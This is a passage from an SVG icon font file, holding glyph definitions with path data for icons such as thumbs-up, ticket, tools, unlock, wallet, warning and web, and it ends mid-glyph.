<glyph glyph-name="thumbs-down" horiz-adv-x="1000" unicode="&#xf00b;" d="M192 269c-32 0-64 0-96 0-24 0-33 9-33 33v420c0 22 10 32 31 33 33 0 66 0 98 0 22-1 33-11 33-33 0-140 0-280 0-421 0-23-10-32-33-32z m640-29h-269c0-2 1-4 1-5 10-50 19-101 19-152 0-33-2-65-16-96-9-19-21-35-43-40-22-6-39 3-42 22-3 14-5 28-7 42-3 32-12 62-34 86-13 14-24 29-37 43-32 33-57 70-74 112-3 8-8 16-12 24-8 13-20 19-35 20-16 1-24 6-28 22-2 7-3 15-3 22 0 115 0 229 0 343 0 6 0 12 1 18 3 18 14 27 32 27 7 0 14 0 21 0 27 2 54 5 80 12 28 6 55 15 84 15h223c1 0 3 0 5 0 51-3 92-44 93-96 27-19 45-51 45-87v-1c0-3 0-6 0-9 4-3 7-5 10-8 21-20 34-47 34-78v-2c0-10-2-20-5-30 37-16 62-53 62-96v-2c1-59-47-106-105-106z" />
<glyph glyph-name="thumbs-up" horiz-adv-x="1000" unicode="&#xf00c;" d="M192 431c-32 0-64 0-96 0-24 0-33-9-33-33v-421c0-21 10-32 31-32 33 0 66 0 98 0 22 0 33 10 33 33 0 140 0 280 0 420 0 24-10 33-33 33z m640 28h-269c0 3 1 4 1 6 10 50 19 100 19 152 0 33-2 65-16 95-9 19-21 35-43 41-22 6-39-3-42-23-3-14-5-28-7-42-3-32-12-61-34-85-13-14-24-30-37-43-32-33-57-70-74-112-3-8-8-16-12-24-8-13-20-19-35-20-16-1-24-7-28-22-2-7-3-15-3-23 0-114 0-228 0-343 0-5 0-11 1-18 3-17 14-26 32-26 7 0 14-1 21-1 27-1 54-5 80-11 28-7 55-16 84-16h223c1 0 3 0 5 1 51 2 92 44 93 95 27 20 45 51 45 87v2c0 3 0 6 0 9 4 2 7 5 10 8 21 19 34 47 34 77v2c0 11-2 21-5 30 37 17 62 54 62 97v1c1 59-47 106-105 106z" />
<glyph glyph-name="tick-boxed" horiz-adv-x="1000" unicode="&#xf00d;" d="M937 713s-33 50-38 50c-228-140-392-317-459-395l-171 134c-5 4-98-80-96-82l312-318c2-2 5-4 9-4 0 0 1 0 2 1 4 1 8 4 9 8 51 128 216 397 428 592 4 3 6 9 4 14z m-110-670c0-33-27-61-60-61h-599c-33 0-60 28-60 61v598c0 33 27 60 60 60h526s21 20 51 46h-622c-33 0-60-27-60-60v-690c0-33 27-60 60-60h690c33 0 60 27 60 60v551c-16-14-32-27-46-37v-468z" />
<glyph glyph-name="tick-mark" horiz-adv-x="1000" unicode="&#xf00e;" d="M933 657c-243-223-432-530-490-678-1-4-6-8-11-8-1-1-1-1-2-1-4 0-8 1-10 4l-357 363c-3 3 105 99 110 95l196-154c76 90 264 293 525 452 5 0 43-57 43-57 2-5 0-12-4-16z" />
<glyph glyph-name="ticket" horiz-adv-x="1000" unicode="&#xf00f;" d="M937 270l-40 124c-1 6-7 9-13 9-40-1-64 13-74 43-5 14-6 29-1 44 6 18 18 30 34 39 5 3 7 9 6 15l-40 125c-2 5-8 8-13 6l-177-56 4-12c-5-2-10-4-15-6-6-2-11-3-16-4l-4 12-518-165c-6-2-9-8-7-13l40-125c2-5 8-9 13-9 40 1 64-14 74-45 11-32 1-57-34-81-4-3-7-10-5-15l40-125c1-5 7-8 13-6l518 165-4 12c4 2 9 4 15 6 5 2 10 3 16 4l3-12 178 57c6 2 9 7 7 13z m-338 304c5 3 10 5 15 6 5 2 10 3 16 4l16-51c-5-2-10-4-15-6-5-2-10-3-16-4l-16 51z m24-74c4 2 9 4 15 6 5 2 10 3 16 4l16-51c-5-3-10-5-15-7-5-1-11-3-16-3l-16 51z m24-75c4 3 9 5 14 6 6 2 11 3 16 4l17-51c-5-2-10-4-15-6-6-2-11-3-16-4l-16 51z m23-74c5 2 10 4 15 6 6 2 11 3 16 4l17-51c-5-3-10-5-15-7-6-1-11-3-16-3l-17 51z m56-122c-5-2-10-3-16-4l-16 51c5 3 10 5 15 7 5 1 11 3 16 3l16-51c-5-2-10-4-15-6z" />
<glyph glyph-name="tie" horiz-adv-x="1000" unicode="&#xf010;" d="M602 490c-7 38-14 77-21 115h-159c-1-3-2-6-2-10-19-103-39-206-58-309-3-21-7-42-11-63l281 104c-10 54-20 109-30 163z m34-182l-288-107c-2-9-3-18-4-27l296 110c-1 8-3 16-4 24z m19-109l-12 66-301-112c1-13 4-26 11-37 37-59 74-118 112-176 23-36 49-36 74-3 2 2 3 5 5 8l102 166c8 12 13 26 13 42 0 16-1 32-4 46z m-289 549c18-31 36-61 54-91 2-3 6-6 9-6 49 0 98 0 147 0 2 0 6 2 8 5 11 19 22 39 34 58 5 9 10 18 15 27 3 6 6 12 8 19 4 17-3 27-19 27-40 0-80 0-121 0h-14c-36 0-71 0-107 0-18 0-25-13-18-31 1-3 3-6 4-8z" />
<glyph glyph-name="toggle-off" horiz-adv-x="1000" unicode="&#xf011;" d="M753 563h-506c-102 0-184-96-184-213s82-213 184-213h506c102 0 184 95 184 213s-82 213-184 213z m-22-389h-462c-92 0-167 78-167 176s75 176 167 176h462c92 0 167-79 167-176s-75-176-167-176z m-290 176c0-74-60-134-134-134s-134 60-134 134c0 74 60 134 134 134s134-60 134-134z m193 50c-4 7-9 11-15 15-6 4-13 5-21 5s-15-1-21-5c-6-3-11-8-15-15-4-6-6-14-8-22-2-9-3-18-3-28 0-10 1-20 3-28 2-9 4-16 8-23 4-6 9-11 15-14s13-6 21-6 15 2 21 6c6 3 11 8 15 14 4 7 7 14 9 23 2 8 2 18 2 28 0 10 0 19-2 28-2 8-5 16-9 22z m-36-97c-16 0-24 15-24 47s8 47 24 47c8 0 14-4 18-12 4-8 6-20 6-35 0-32-8-47-24-47z m66 115v-136c3-1 7-1 11-1 3 0 7 0 11 1v57h31c1 4 1 8 1 12 0 3 0 7-1 11h-31v32h40c0 4 0 8 0 12 0 4 0 8 0 12h-62v0z m77 0v-136c3-1 7-1 11-1 3 0 7 0 11 1v57h31c1 4 1 8 1 12 0 3 0 7-1 11h-31v32h39c1 4 1 8 1 12 0 4 0 8-1 12h-61v0z" />
<glyph glyph-name="toggle-on" horiz-adv-x="1000" unicode="&#xf012;" d="M753 563h-506c-102 0-184-96-184-213 0-118 82-213 184-213h506c102 0 184 95 184 213 1 117-82 213-184 213z m-22-389h-462c-92 0-167 78-167 176s75 176 167 176h462c92 0 167-79 167-176s-75-176-167-176z m-38 310c-74 0-134-60-134-134 0-74 60-134 134-134s134 60 134 134-60 134-134 134z m-387-78c-4 6-8 11-14 14-6 4-13 6-22 6s-15-2-21-6c-6-3-11-8-15-14-3-7-6-14-8-23-2-9-3-18-3-28s1-19 3-28c2-9 5-16 8-22 4-7 9-11 15-15s13-5 21-5 16 2 22 5c6 4 10 8 14 15 4 6 7 13 9 22 2 8 3 18 3 28s-1 19-3 28-5 16-9 23z m-36-98c-15 0-23 16-23 47s8 47 23 47c8 0 14-4 18-12 4-8 6-20 6-35 0-31-8-47-24-47z m126 115v-86l-42 86c-3 1-6 1-9 1-3 0-6 0-9-1v-136c3-1 6-1 10-1 3 0 6 0 10 1v87l42-87c3-1 6-1 9-1 3 0 6 0 9 1v136c-3 1-6 1-9 1-3 0-7 0-11-1z" />
<glyph glyph-name="tools-alt-2" horiz-adv-x="1000" unicode="&#xf013;" d="M671 428c30 31 59 47 102 39 42-7 82 0 115 33 41 41 63 108 41 162-26-29-50-54-73-80-11-12-21-14-36-10-75 20-74 19-94 92-6 19-2 31 12 43 24 23 47 47 73 73-111 24-196-47-191-153 1-11 0-23 1-34 4-23-5-38-21-55-99-97-197-196-295-295-12-12-25-16-42-16-34 2-71 9-102-1-79-27-118-129-89-192 26 28 49 54 73 80 7 8 13 14 26 13 73-11 82-20 103-91 7-23 2-37-15-51-25-20-48-41-72-62 111-34 202 41 195 145-1 14-2 29-3 43-2 16 3 27 15 39 93 92 186 183 277 278z m17-126c-19 20-31 24-47 0-3-4-7-8-11-10-18-13-16-23-1-37 59-57 116-115 175-173 14-14 28-30 9-47-17-16-32-4-45 10-55 55-112 108-165 165-21 22-35 28-54 1-3-4-7-8-11-11-13-10-13-18-1-30 75-74 149-150 226-224 30-30 69-37 109-19 38 17 55 49 59 84 0 37-14 62-36 85-70 68-139 136-207 206z m-569 333c20-20 40-42 72-37 18 2 28-5 40-16 47-48 96-95 143-143 15-16 22-10 35 2 13 13 14 21 0 34-46 44-90 89-135 134-15 15-36 28-23 52 0 35-24 54-45 73-45 42-45 41-88-2-49-48-49-49 1-97z" />
<glyph glyph-name="tools" horiz-adv-x="1000" unicode="&#xf014;" d="M594 318c-4 2-5 4-5 8 0 11 0 22 0 32 0 3 2 6 4 7 7 5 15 9 22 13 15 9 30 17 47 27-6 17-12 34-18 50-2 6-5 7-11 7-23-3-46-5-69-7-4-1-7 1-9 4-6 9-13 17-19 25-2 3-3 5-1 9 3 7 6 14 9 22 8 16 15 32 22 49-16 11-31 21-47 32-3 3-5 1-8-1-18-16-36-31-54-47-3-2-6-3-10-1-10 3-20 6-30 9-4 1-6 3-7 8-5 24-11 48-17 73h-62c-6-25-12-49-17-74-1-4-3-6-7-7-10-3-20-6-30-9-4-2-7-1-10 2-18 15-36 31-54 46-2 1-6 2-7 1-16-10-32-21-48-32 10-25 21-47 31-70 2-5 1-7-2-11-5-7-11-13-15-21-4-7-9-8-17-7-22 3-45 5-67 6-2 1-6-1-6-2-7-18-13-36-20-54 4-2 6-3 8-5 20-11 40-23 60-34 4-2 5-5 5-9 0-10 0-20 0-30 0-5-1-7-5-10-20-11-40-22-60-34-2-1-4-2-7-5 6-17 12-33 17-50 2-6 6-7 11-6 23 2 46 4 69 7 4 0 7-1 10-5 5-8 11-16 17-23 4-4 4-8 2-13-11-22-21-45-31-68 16-11 32-22 48-33 1-1 5 0 7 2 18 15 36 30 54 46 3 3 6 3 10 2 10-4 19-7 29-9 5-2 7-4 8-9 5-24 11-48 17-73h62c6 25 12 49 17 74 1 4 3 6 8 8 10 2 20 5 29 9 5 1 7 1 10-2 18-16 36-31 54-47 2-1 6-2 7-1 16 11 32 22 48 33-10 24-21 47-31 70-2 4-1 7 1 10 6 7 12 13 17 21 4 8 9 8 16 7 23-2 45-4 67-6 3 0 6 2 7 4 6 17 12 35 19 52-4 3-6 4-8 5-20 12-40 24-60 35z m-237-73c-52 2-96 47-95 99 2 55 48 96 105 95 53-1 96-47 95-100-2-54-48-95-105-94z m535 390c-8 6-17 12-27 19v-12c0-27 0-53 0-79 0-5-2-8-6-10-18-9-35-19-53-28-4-3-8-3-13 0-16 9-33 18-51 27-6 3-7 6-7 12 0 29 0 58 0 89-29-15-49-35-61-61-28-59-6-121 52-148 7-3 9-7 9-13v-90l-1-225c0-4 0-8 1-12 2-46 56-72 98-49 23 13 32 33 32 58 0 76 0 152 0 228 0 30 0 60 0 91 0 6 2 9 8 12 22 10 40 25 52 46 25 46 11 110-33 145z m-91-558c-15 0-27 12-27 26 1 14 14 25 28 25 15-1 28-13 27-27-1-14-13-24-28-24z" />
<glyph glyph-name="touch" horiz-adv-x="1000" unicode="&#xf015;" d="M491-88c-4 2-9 1-13 1l-98 1c-29 0-44 12-53 39-8 29-14 59-21 88-7 33-22 62-45 87-5 6-11 12-16 18-11 12-16 26-9 42 8 16 21 25 38 25 33 2 60-13 84-34 20-19 35-41 42-68 1-2 2-4 4-6v395c0 8 0 15 0 23-1 34 29 49 55 45 24-4 37-18 39-42 2-41 4-81 6-121 3-53 5-106 8-160 3 6 5 11 9 15 14 18 33 21 54 18 18-3 33-12 40-30 5-13 4-27 5-40 1-3 1-5 1-8 4 13 11 24 23 30 12 6 25 8 37 5 32-7 39-19 43-76 1 0 2 2 2 3 6 22 28 30 43 28 24-2 40-15 43-37 3-17 1-34 2-52 0-48-3-96-9-144-2-22-15-37-36-43-1 0-2-1-3-1l-275-1z m29 876c5-3 11-5 15-8 13-10 17-23 14-38-6-25-13-51-21-76-7-24-34-33-55-20-13 8-19 25-15 42 6 23 12 46 18 69 4 16 14 25 29 30l15 1z m-295-168c10-1 23-6 35-9 15-3 29-8 44-12 21-6 33-25 28-45-5-20-25-32-46-27-25 6-50 13-74 20-19 6-30 23-27 41 4 19 19 32 40 32z m-16-217c0 14 6 25 18 32 22 13 44 26 66 38 20 11 41 4 51-14 10-18 4-39-14-50-22-13-44-26-66-38-26-14-55 3-55 32z m472 21c-7-1-13 1-19 3-21 6-43 11-64 17-21 6-32 25-26 46 5 20 25 31 46 25 24-6 48-12 72-19 19-6 31-23 28-41-3-18-19-32-37-31z m-349 340c14 0 25-6 32-18 13-22 26-44 38-67 13-23 1-49-25-54-14-3-27 1-36 14-15 24-30 49-43 75-11 23 9 49 34 50z m222-162c0 13 5 24 16 30 23 14 47 28 71 41 17 9 38 3 47-13 11-18 7-39-11-50-23-15-47-29-72-41-24-12-51 7-51 33z" />
<glyph glyph-name="traffic-light" horiz-adv-x="1000" unicode="&#xf016;" d="M670 181c0 40 0 80 0 119 0 9 2 15 7 22 30 37 59 75 88 113 2 3 4 6 8 11h-103c0 2 0 4 0 5 0 42 0 84 0 126 0 4 2 7 4 10 31 40 61 80 92 120 2 2 4 5 7 9h-102v72h-342v-73h-102c2-3 4-6 6-8 31-40 62-80 92-120 3-3 4-8 4-11 0-32 0-64 0-96v-35h-102c2-2 3-3 4-5 31-40 62-80 93-121 3-3 5-8 5-12 1-33 0-67 0-101v-34h-102c2-3 3-5 4-7 32-40 63-81 94-121 3-4 4-8 4-12 0-24 0-48 0-72v-20h101v-28h140v28h99c1 3 1 6 1 8 0 28 0 55 0 83 0 5 2 10 5 13 30 40 60 79 91 118 2 3 4 6 7 11h-103v8z m-171-213c-58 0-105 48-105 106 0 59 47 106 106 106 58 0 106-48 106-105 0-59-48-107-107-107z m106 374c-3-59-53-104-110-100-61 4-106 53-101 113 4 60 56 103 115 98 55-5 100-55 96-111z m-105 143c-77 0-139 62-138 137 0 76 62 138 137 138 76 0 138-62 138-138 1-76-61-137-137-137z m0 243c-63 0-107-53-107-107 0-58 47-108 108-107 57 0 103 47 105 104 2 60-46 110-106 110z" />
<glyph glyph-name="transparent" horiz-adv-x="1000" unicode="&#xf017;" d="M765 613c-11-2-171-2-176 1v173h-175v-174c-10-2-171-2-176 1v172c-7 2-171 1-174 0-2-9 0-170 0-175h174v-174h-174c-2-11 0-171 0-176h174v-175h-174c-2-7 0-154 0-174h175v173c4 0 165 1 174 0 1-4 1-158 0-173h177v173h174c1-4 1-154 1-173h172v174h-172v175h172v177h-172v173h172v176h-172v-174z m-352-351c-4 0-159-1-173 0-2 4-2 165 0 174h173v-174z m176-175c-5-2-165-2-175-1v175h175v-174z m-175 351v173h175c0-5 1-166 0-173h-175z m351-176h-175c-1 4-1 165 0 174h175v-174z" />
<glyph glyph-name="tree" horiz-adv-x="1000" unicode="&#xf018;" d="M868 505c-15 40-42 68-81 84-5 2-6 4-6 9 2 68-48 128-116 140-8 1-15 4-22 10-21 21-46 34-76 38-1 0-2 1-4 1h-31c-10-2-21-4-31-8-29-9-52-27-69-52-3-4-5-5-9-2-85 42-185-7-202-100-2-11-2-22-3-34-1 0-2-1-4-1-49-21-79-58-88-112 0-1-1-2-1-3v-32c2-11 4-22 8-32 28-77 119-118 196-77 5 3 8 3 13 0 30-15 60-20 91-13v-312h-89c-13 0-24-11-24-25v-48c0-13 11-24 24-24h312c13 0 24 11 24 24v48c0 14-11 25-24 25h-89v310c6 0 12 0 18-1 26-1 51 4 74 17 4 2 7 2 11 0 86-46 191 8 204 104 0 1 1 2 1 4v32c-2 10-4 21-7 30z" />
<glyph glyph-name="unique-idea" horiz-adv-x="1000" unicode="&#xf019;" d="M507-149c-51 0-103 2-155-1-31-2-37 9-32 37 9 57 5 115-5 172-4 24-14 40-36 53-204 131-256 391-115 581 94 126 228 168 379 155 127-11 235-67 318-166 12-15 23-30 30-48 7-20 7-38-14-49-16-7-11-19-9-30 6-27 12-54 19-81 6-24 9-47-10-67-8-8-2-17 0-25 12-40 24-80 36-120 5-17 4-29-16-33-19-5-20-18-17-34 7-33 9-65 7-98-2-40-23-59-64-62-37-2-75-5-113-6-18 0-24-7-22-25 3-42 3-83 7-125 2-22-4-29-27-29-54 2-107 1-161 1z m-128 404c11 7 15-4 22-8 10-5 20-17 31-3 10 13 2 24-9 32-32 25-64 49-96 74-10 7-20 12-29 1-7-10-3-21 5-29 11-11 28-16 35-31-10-12-19 14-27 0-6-10-2-21 3-31 9-16 23-24 41-23 12 0 25 1 24 18z m113 404c-70 0-120-50-119-120 1-23 11-48 4-68-20-58 15-77 57-96 7-3 14-8 21-11 5-3 11-5 16 1 27 32 68 42 103 62 29 17 49 40 56 73 17 80-52 160-138 159z m-48-374c10 0 16 4 18 11 3 11-2 19-11 26-31 24-63 48-95 72-10 8-21 18-32 2-10-14 1-24 12-32 30-23 61-47 92-70 6-4 12-7 16-9z m189 445c0 10-8 11-14 15-6 5-12 4-16-4-7-13-15-26-23-39-5-8-1-13 6-16 6-2 12-11 18-4 11 16 19 32 29 48z m84-86c-9 8-8 27-26 16-11-7-22-13-34-19-9-6-11-12-5-22 6-9 11-13 20-6 15 11 34 14 45 31z m-331 107c-5-6-15-6-18-15-2-5 24-50 30-52 9-3 15 3 20 8 8 8 0 15-4 21-8 13-12 29-28 38z m130-8c-2 11 4 23-4 31-6 7-20 7-23 0-8-20-7-41-1-61 3-8 18-7 24-1 9 8 2 21 4 31z m192-197h-21c-11 0-11-8-11-16 0-20 16-15 25-13 14 2 35-13 41 12 2 8 1 17-10 17-8 0-16 0-24 0z" />
<glyph glyph-name="unlock" horiz-adv-x="1000" unicode="&#xf01a;" d="M785 398v-470c0-9-7-16-15-16h-540c-8 0-15 7-15 16v470c0 8 7 15 15 15h43c5 0 10 1 13 4 0 0 1 2 1 3v7c0 36 0 71 0 108 0 21 0 43 3 65 19 129 148 214 274 180 90-24 158-103 163-195 2-38 1-77 1-116h-82c0 30 1 60 0 90 0 12-1 24-3 35-13 67-74 114-144 111-65-3-126-61-128-126-2-50-1-101-2-150v-8c0-2 1-3 3-4 0 0 8-4 14-4h384c8 0 15-7 15-15z" />
<glyph glyph-name="unlocked" horiz-adv-x="1000" unicode="&#xf01b;" d="M928 398v-470c0-9-7-15-15-15h-540c-9 0-16 6-16 15v470c0 8 7 15 16 15h42c9 0 16 3 16 8v7c-1 50 0 100-1 150-3 66-63 123-129 127-69 3-130-44-144-111-2-11-3-23-3-35 0-45 0-89 0-134v-4s-7-5-15-5h-52c-8 0-15 7-15 16 0 51-1 102 1 152 5 93 73 172 163 196 126 34 255-50 274-180 3-21 3-44 3-65 0-36 0-72 0-108v-7s7-7 15-7h385c8 0 15-7 15-15z" />
<glyph glyph-name="upload-alt" horiz-adv-x="1000" unicode="&#xf01c;" d="M483 753c9 9 25 9 35 0l294-286c9-9 9-24 0-34l-59-57c-9-9-25-9-35 0l-139 136v-364c0-14-11-24-25-24h-98c-14 0-25 10-25 24v374l-149-146c-10-9-25-9-35 0l-59 57c-9 10-9 25 0 34l295 286z m333-485v-206h-632v206h-121v-267c0-34 27-61 60-61h754c33 0 60 27 60 61v267h-121z" />
<glyph glyph-name="upload" horiz-adv-x="1000" unicode="&#xf01d;" d="M363 356c10-10 25-10 35 0l150 145v-375c0-13 11-24 25-24h99c13 0 24 11 24 24v365l140-135c10-10 25-10 35 0l58 57c10 9 10 24 0 34l-295 286c-9 10-25 10-35 0l-295-286c-9-10-9-25 0-34l59-57z m360-196v-52c0-16-15-30-33-30h-132c-18 0-33 14-33 30v52h-462v-201h875v201h-215z m-554-137c-21 0-37 16-37 36 0 20 16 36 37 36s37-16 37-36c0-20-17-36-37-36z m132 0c-21 0-37 16-37 36 0 20 16 36 37 36 20 0 37-16 37-36 0-20-17-36-37-36z" />
<glyph glyph-name="usb-drive" horiz-adv-x="1000" unicode="&#xf01e;" d="M494 787c-38 0-76 0-113 0-12 0-13-7-13-16v-204h126v220z m-36-118c0-7-5-12-12-12h-31c-6 0-12 5-12 12v16c0 7 6 12 12 12h31c7 0 12-5 12-12v-16z m174 104c0 11-6 15-17 15-28-1-57-1-86-1h-24v-220h127v206z m-36-104c0-7-5-12-12-12h-31c-7 0-12 5-12 12v16c0 7 5 12 12 12h31c7 0 12-5 12-12v-16z m74-110c-113 0-227 0-340 0-26 0-35-10-35-36v-577c0-24 9-34 33-34h343c25 0 34 9 34 34v578c0 25-10 35-35 35z m9-577c0-22-7-30-29-30h-301c-21 0-29 8-29 29v15c0-20 8-28 29-28h301c22 0 29 8 29 29v-15z" />
<glyph glyph-name="usb" horiz-adv-x="1000" unicode="&#xf01f;" d="M710 540v105h-104v-105h34c0-8 0-23 0-23 0-11 0-21-1-31-1-11-9-23-17-31-21-22-43-43-66-64-12-11-24-23-37-35v326h42c-21 36-40 70-61 106-20-36-40-70-60-107h42v-457c-3 2-4 3-5 4-32 30-64 61-96 91-15 14-21 29-21 49 1 23 1 46 0 70 0 7 2 11 9 15 16 9 25 24 26 42 2 25-16 50-40 55-25 6-51-7-61-31-9-24-1-52 21-65 9-5 11-10 11-19-1-22 0-45-1-66-1-33 13-58 36-80 34-33 69-66 104-99 12-12 18-26 18-43-1-15-1-29 0-44 0-2 0-3-1-5-43-8-76-46-76-92 0-52 42-94 94-94s94 42 94 94c0 46-33 84-76 92 0 0-1 1-1 1 1 61 1 123 1 184 0 15 5 28 16 38 33 32 65 64 99 94 29 26 42 55 42 96 0 4 0 12 0 12 0 6 0 12 0 17h35z" />
<glyph glyph-name="vector-path" horiz-adv-x="1000" unicode="&#xf020;" d="M832 415c-57 109-170 176-289 183-5 0-5 1-1 3l109 47c4 2 10 0 13-3 10-10 26-13 40-8 19 8 28 30 20 48-9 19-31 26-50 19-14-6-22-20-22-34 1-4-2-9-6-11l-137-57c-4-2-11-3-16-4-8 0-16-1-24-2-4-1-9 1-11 6l-16 34c-2 4-7 6-11 4l-121-51c-4-2-6-6-4-11l14-31c2-4 1-9-3-12-11-7-21-15-31-24-3-3-9-7-13-9l-135-56c-4-2-10 0-13 3-11 9-27 12-41 7-19-8-27-29-19-48 8-18 31-26 50-19 14 6 21 20 21 34 0 4 3 9 7 11l108 45c4 2 5 0 2-3-77-88-102-214-58-328 2-4 0-9-4-11l-29-12c-5-2-7-7-5-11l53-116c2-4 7-6 11-4l121 50c4 2 6 7 4 11l-52 116c-2 5-7 7-12 5l-38-16c-4-2-9 0-11 4-45 122-2 256 100 334 4 3 9 2 11-2l15-34c2-4 7-6 11-4l120 51c5 2 7 6 5 11l-13 31c-2 4 0 8 5 8 124 14 250-47 309-159 2-4 1-9-4-11l-40-17c-4-2-6-7-4-11l53-116c2-4 7-6 11-4l121 50c4 2 6 7 4 11l-53 116c-1 5-6 7-11 5l-30-13c-4-1-9 1-11 5z" />
<glyph glyph-name="verification-check" horiz-adv-x="1000" unicode="&#xf021;" d="M793 687c-133-126-265-252-397-378-9-8-23-8-31 1l-140 147c-8 9-22 10-31 2-42-36-82-72-124-109-9-8-10-21-2-30 93-102 185-204 278-306 8-8 22-9 31-1 185 173 369 344 553 515 9 9 10 23 2 32-37 42-73 84-109 126-8 9-21 10-30 1z" />
<glyph glyph-name="wall-clock" horiz-adv-x="1000" unicode="&#xf022;" d="M63 352c-1-243 196-440 439-440 239 1 436 198 436 439 0 240-197 437-438 437-240-1-437-197-437-436z m824-3c0-213-174-387-387-386-214 0-387 174-387 388 0 212 176 387 389 386 213 0 386-175 385-388z m-432 17c-1-4-2-8-2-12 0-26 20-46 46-46 15 0 29 8 37 19 2 3 4 6 4 6h1c94 0 189 0 283 0h8c3 0 6 3 6 6v20c0 4-3 7-6 7h-8c-93 0-186 0-280 0h0c0 0-1 3-3 6-7 16-23 28-42 28-4 0-8-1-12-2-3-1-8 0-11 3-34 33-67 66-101 99-11 11-21 22-32 34-2 2-6 3-9 0-6-6-11-11-16-16-3-3-3-7 0-9 45-45 90-89 134-133 3-2 3-7 3-10z m22-326c0-12 10-22 22-22 12 0 21 10 22 22 0 11-10 21-22 21-12 0-21-9-22-21z m155 579c0-12 9-22 21-22 12 0 22 10 22 22 0 11-10 21-22 22-11 0-21-10-21-22z m-151 40c0-12 10-22 22-21 12 0 21 9 21 21 0 12-10 22-22 22-12-1-21-10-21-22z m-228-156c-1 12-10 22-22 22-11-1-21-11-21-22-1-12 9-21 21-21 12 0 22 9 22 21z m115-422c0 12-9 21-20 21-12 0-22-10-22-22 0-12 9-21 22-21 12 0 21 9 20 22z m378 423c0-11 10-22 21-22 12 0 22 10 22 22 0 11-9 21-22 21-12 0-21-9-21-21z m2-308c0-12 10-21 21-21 12 0 22 9 22 21 0 12-9 22-21 22-11 0-22-11-22-22z m-535 156c-1 11-11 21-22 21-12 0-22-10-21-22 0-12 10-22 21-21 12 0 22 10 22 22z m41-157c1 11-9 21-21 21-12 0-22-9-22-21 0-12 10-22 22-22 11 0 21 11 21 22z m114 422c0 12-10 22-22 22-12 0-21-10-21-22 0-12 9-21 21-21 11-1 22 10 22 21z m266-536c0-12 9-21 21-21 11-1 22 10 22 21 0 12-10 22-22 22-12 0-21-10-21-22z" />
<glyph glyph-name="wall" horiz-adv-x="1000" unicode="&#xf023;" d="M665 30h272v106h-272v-106z m122 239h-272v-104h272v104z m-302 1h-271v-105h271v105z m452 131h-272v-104h272v104z m-302 2h-271v-106h271v106z m-572-106h272v105h-272v-105z m452 135h272v104h-272v-104z m422 237h-272v-104h272v104z m-302 0h-270v-105h270v105z m-301 0h-271v-104h271v104z m150-133h-270v-104h270v104z m-421-505h272v103h-272v-103z m301 0h272v103h-272v-103z m-181 238h-120v-104h120v104z m633-105h121v105h-121v-105z m0 371v-103h122v103h-122z m-752 1v-105h120v105h-120z" />
<glyph glyph-name="wallet" horiz-adv-x="1000" unicode="&#xf024;" d="M485 454v20c0 64 52 116 116 116h284v34c0 30-25 55-55 55h-713c-30 0-54-25-54-55v-548c0-30 24-55 54-55h713c30 0 55 25 55 55v262h-284c-64 0-116 52-116 116z m412 108h-279c-50 0-90-41-90-91v-15c0-50 40-90 90-90h279c22 0 41 18 41 41v114c0 22-19 41-41 41z m-264-146c-27 0-48 21-48 48s21 48 48 48 48-22 48-48c0-27-22-48-48-48z" />
<glyph glyph-name="warning-alt" horiz-adv-x="1000" unicode="&#xf025;" d="M500 788c-241 0-437-196-437-438s196-438 437-438c242 0 438 197 438 438s-196 438-438 438z m66-645c0-37-28-66-66-66s-65 29-65 66v1c0 37 27 65 65 65 38 0 66-28 66-65v-1z m-31 151c-2-21-16-34-35-34-19 0-33 13-35 34l-33 289c-2 22 10 40 30 40h76c20 0 33-18 30-40l-33-289z" />
<glyph glyph-name="warning" horiz-adv-x="1000" unicode="&#xf026;" d="M132-46h737c51 0 84 55 61 101l-368 652c-26 51-98 51-124 0l-368-652c-23-46 10-101 62-101z m426 152c0-34-25-60-60-60s-60 26-60 60v2c0 34 25 60 60 60s60-26 60-60v-2z m-92 441h69c19 0 30-16 28-36l-30-266c-2-19-15-31-33-31-17 0-30 12-32 31l-31 266c-2 20 10 36 29 36z" />
<glyph glyph-name="water-drop" horiz-adv-x="1000" unicode="&#xf027;" d="M767 287l-254 488c-8 17-22 17-31 0l-252-488c-8-17-20-45-23-63-27-176 144-312 292-312 148 0 328 133 293 312-4 18-16 46-25 63z m-283-312s-5 1-15 2c-2 1-5 1-8 2-3 1-7 1-11 2-8 2-18 5-26 8-5 2-9 4-14 6-5 2-9 4-14 7-5 2-10 5-15 8-8 5-21 14-28 20-5 4-9 7-14 12-9 8-16 17-24 26-7 10-14 19-20 30-3 4-5 9-8 15-3 8-9 22-11 30-2 5-4 10-5 15 0 2-1 4-1 7-1 3-2 9-3 13l0 7c-2 8-2 16-2 22 0 7 0 13 0 18 1 3 1 5 1 7 0 4 1 4 2 0 0-2 1-4 1-7 1-5 2-10 4-16 2-7 4-14 7-21 1-2 2-4 3-6 1-3 3-8 5-11 1-2 2-4 3-6 2-4 4-8 7-12 4-6 12-16 17-23 3-3 6-7 10-10 3-4 7-7 11-10 6-6 16-13 23-18s18-10 25-13c7-3 18-7 24-9 4-1 8-2 13-3 3-1 7-1 11-2 3 0 7-1 10-1 7-1 12-1 17 0 3 0 5 0 7 0 3 0 5 0 8 0 9 1 15 1 15 1 25 2 47-16 49-41 2-26-17-48-42-50-4 0-8 0-12 1z" />
<glyph glyph-name="web" horiz-adv-x="1000" unicode="&#xf028;" d="M891 473c-52 166-208 287-390 287-184 0-340-120-392-287h-46v-246h46c52-166 208-287 392-287 182 0 337 121 390 287h47v246h-47z m-151 145c-17-7-34-14-49-20-16 28-32 55-48 82 35-15 67-35 97-62z m-82-202h32l15-83 18 83h27l19-83 15 83h32l-28-132h-34l-18 75-17-75h-33l-28 132z m14-189c-4-19-9-37-12-56-1-5-3-7-9-6-41 7-83 14-126 21v41h147z m-146 480c59-22 88-71 115-125-39-6-77-11-115-17v142z m0-191c15 2 31 3 47 5 25 4 51 9 77 13 4 2 8 2 9-4 6-19 10-38 14-57h-147v43z m-51 189v-137c-39 0-76 6-114 15 20 57 75 117 114 122z m-146-232c4 19 8 37 11 55 2 7 4 8 11 7 39-10 79-16 120-18 1 0 2 0 4-1v-43h-146v0z m13-57l-28-132h-33l-18 75-17-76h-33l-28 133h31l15-83 19 83h27l18-83 16 83h31v0z m15 264c-16-27-31-54-47-82-16 7-32 13-50 20 30 27 62 47 97 62z m-134-100c24-10 47-20 71-30-8-25-14-51-18-77h-114c14 39 34 74 61 107z m-61-353h114c4-26 10-52 18-77-24-10-47-20-71-30-27 33-47 68-61 107z m98-145c18 7 34 13 50 19 16-27 31-54 47-81-35 14-67 35-97 62z m215-87c-43 8-91 64-113 121 21 8 94 18 113 15v-136z m0 